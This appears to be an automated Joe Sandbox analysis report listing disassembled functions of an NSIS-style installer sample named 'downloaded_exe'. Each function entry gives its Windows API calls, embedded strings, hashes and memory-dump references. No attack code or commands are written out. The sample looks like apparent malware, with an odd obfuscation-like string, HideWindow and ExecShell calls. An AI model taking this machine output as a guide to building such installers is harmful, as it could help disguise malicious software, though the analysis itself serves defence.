Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004035C4
GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C

Strings

soft, xrefs: 004036A1
Inst, xrefs: 00403698
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
Error launching installer, xrefs: 00403603
Null, xrefs: 004036AA

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 175
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 004033F1
GetTickCount.KERNEL32 ref: 00403492
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
wsprintfW.USER32 ref: 004034CE
WriteFile.KERNELBASE(00000000,00000000,00425979,00403792,00000000), ref: 004034FF
WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597

Strings

pAB, xrefs: 004033AB
(]C, xrefs: 004033FD
yYB, xrefs: 0040346F, 0040348A, 00403513
... %d%%, xrefs: 004034C8

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: CountFileTickWrite$wsprintf
String ID: (]C$... %d%%$pAB$yYB
API String ID: 651206458-4203522772
Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00425979,759223A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00425979,759223A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,759223A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00425979,759223A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GlobalFree.KERNELBASE(0058B880), ref: 00402387

Strings

Exch: stack < %d elements, xrefs: 00401ED8
Pop: stack empty, xrefs: 00401F2C
SyndicateMapHappensAttractionSexually, xrefs: 00401EFB, 00401F00, 00401F1A

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: FreeGloballstrcpyn
String ID: Exch: stack < %d elements$Pop: stack empty$SyndicateMapHappensAttractionSexually
API String ID: 1459762280-451427882
Opcode ID: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction ID: 50a08f61e59307d203ec8fda99e8a78aa4432658e9e299f93ea532572e85a124
Opcode Fuzzy Hash: f687fe266335390464c7bf33a5a6109902a608d988a78738c483845962ee8b52
Instruction Fuzzy Hash: 4921FF72640001EBD710EF98DD81A6E77A8AA04358720413BF503F32E1DB799C11966D

Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

GlobalFree.KERNELBASE(0058B880), ref: 00402387

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
SyndicateMapHappensAttractionSexually, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$SyndicateMapHappensAttractionSexually$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-4212758423
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00425979,759223A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00425979,759223A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00425979,759223A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
GetProcAddress.KERNEL32(00000000), ref: 00406353

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000040C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000420000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.0000000000434000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000046B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330226022.000000000049F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330372487.0000000000500000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_downloaded_exe.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000009.00000002.2330171067.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.2330152790.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmpDownload File
